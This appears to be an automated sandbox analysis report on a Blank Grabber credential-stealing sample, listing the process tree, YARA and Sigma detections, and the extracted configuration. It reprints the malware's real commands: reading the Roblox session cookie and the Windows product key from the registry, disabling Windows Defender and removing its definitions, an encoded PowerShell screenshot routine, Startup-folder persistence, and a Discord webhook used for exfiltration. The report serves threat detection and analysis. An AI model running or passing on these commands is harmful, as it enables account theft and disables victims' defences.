conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2180 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2008 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 9144 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 8992 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7756 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7920 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8092 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1284 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 2032 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8868 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8388 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8440 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

svchost.exe (PID: 8572 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: El9HaBFrFM.exe PID: 7516	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: El9HaBFrFM.exe PID: 7532	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: El9HaBFrFM.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: El9HaBFrFM.exe PID: 7532	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 8 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", ProcessId: 7596, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7604, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", ProcessId: 9144, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7700, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7932, ProcessName: powershell.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

